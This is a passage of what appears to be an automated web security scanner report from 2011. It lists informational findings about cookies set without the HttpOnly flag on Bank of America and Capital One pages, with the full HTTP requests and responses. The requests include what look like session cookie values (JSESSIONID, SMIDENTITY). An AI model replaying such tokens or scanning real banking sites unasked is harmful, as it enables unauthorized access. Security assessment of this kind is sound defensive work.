The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:06:01 GMT
Content-type: magnus-internal/cold-fusion
Location: /state.cgi?section=generic&url=search/&question_box=&ui_mode=question
Connection: close
Set-Cookie: BIGipServerngen-www.80=818329259.20480.0000; path=/


11.407. http://www.bankofamerica.com/signin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 301 Moved permanently
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:56 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Location: https://www4.bankofamerica.com/hub/index.action?template=signin
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=3167139499.20480.0000; path=/


                                                                           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

   
       

11.408. http://www.bankofamerica.com/state.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /state.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /state.cgi HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:55 GMT
Content-length: 0
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/stateerror?referer=
Connection: close
Set-Cookie: BIGipServerngen-www.80=2814752427.20480.0000; path=/


11.409. http://www.bankofamerica.com/state.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /state.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /state.cgi?section=contact HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:55 GMT
Content-length: 0
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-cookie: cookiecheck=enabled; path=/;
Location: http://www.bankofamerica.com/state.cgi?section=contact&update=&cookiecheck=yes
Connection: close
Set-Cookie: BIGipServerngen-www.80=432387755.20480.0000; path=/


11.410. http://www.bankofamerica.com/studentbanking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /studentbanking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /studentbanking/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:54 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=studentchecking&destination=nba/studentbanking/index.cfm?template=stb_overview&context=
Connection: close
Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/


11.411. http://www.bankofamerica.com/studentbanking/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /studentbanking/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /studentbanking/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:46 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=studentchecking&destination=nba/studentbanking/index.cfm?template=stb_overview&context=
Connection: close
Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/


11.412. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /vehicle_and_personal_loans/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vehicle_and_personal_loans/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:58 GMT
Content-type: magnus-internal/cold-fusion
Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/vehicle_and_personal_loans/index.cfm?adlink=&context=&override_debug_mode=DEBUG&type=
Connection: close
Set-Cookie: BIGipServerngen-www.80=3869619883.20480.0000; path=/


<link rel="canonical" href="http://www.bankofamerica.com/vehicle_and_personal_loans/" />
<script language="JavaScript" type="text/javascript">
   <!--
   function help_popup(location)
       {
       window.open(
...[SNIP]...

11.413. http://www.bankofamerica.com/www/global/js/tc_logging.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /www/global/js/tc_logging.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/global/js/tc_logging.js? HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000; CMAVID=none

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-length: 12165
Content-type: application/x-javascript
Last-modified: Sun, 27 Sep 2009 16:10:32 GMT
Etag: "2f85-4abf8e78"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1447474859.20480.0000; path=/

/* TouchClarity
* Copyright (c) Omniture 2001-2007. All rights reserved. Patent Pending.
* Privacy Policy at http://www.touchclarity.com/privacy/
*/

/************************** CONFIG SECTIO
...[SNIP]...

11.414. http://www.bankofamerica.com/www/global/js/tc_throttle.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /www/global/js/tc_throttle.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/global/js/tc_throttle.js?timestamp=20111216538488 HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; CMAVID=none; BIGipServerngen-www.80=1447474859.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:14:59 GMT
Content-length: 1825
Content-type: application/x-javascript
Last-modified: Sat, 06 Sep 2008 02:36:19 GMT
Etag: "721-48c1eca3"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1707521707.20480.0000; path=/

// Configurable throttle values.
var throttle_percent_ngen = 100;
var throttle_percent_olb = 100;
var throttle_counter_active = false;
var throttle_counter_percent = 0;

// Default values
tc_logging
...[SNIP]...

11.415. http://www.bankofamerica.com/x.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /x.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-length: 49
Content-type: image/gif
Last-modified: Fri, 26 Mar 2004 21:40:13 GMT
Etag: "31-4064a33d"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1548138155.20480.0000; path=/

GIF89a...................!.......,...........T..;

11.416. https://www.bankofamerica.com/retirementcenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /retirementcenter

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retirementcenter HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:37:19 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:37:19 GMT
Location: https://www.bankofamerica.com/retirementcenter/
Connection: close


11.417. http://www.capitalone.com/autoloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:23 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 30558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Auto Loans - Ca
...[SNIP]...

11.418. http://www.capitalone.com/autoloans/auto-loan-calculator.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/auto-loan-calculator.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/auto-loan-calculator.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:26 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 33970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Auto Payment and Other Auto Calculators - Capital One</title>

...[SNIP]...

11.419. http://www.capitalone.com/autoloans/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:24 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:24 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
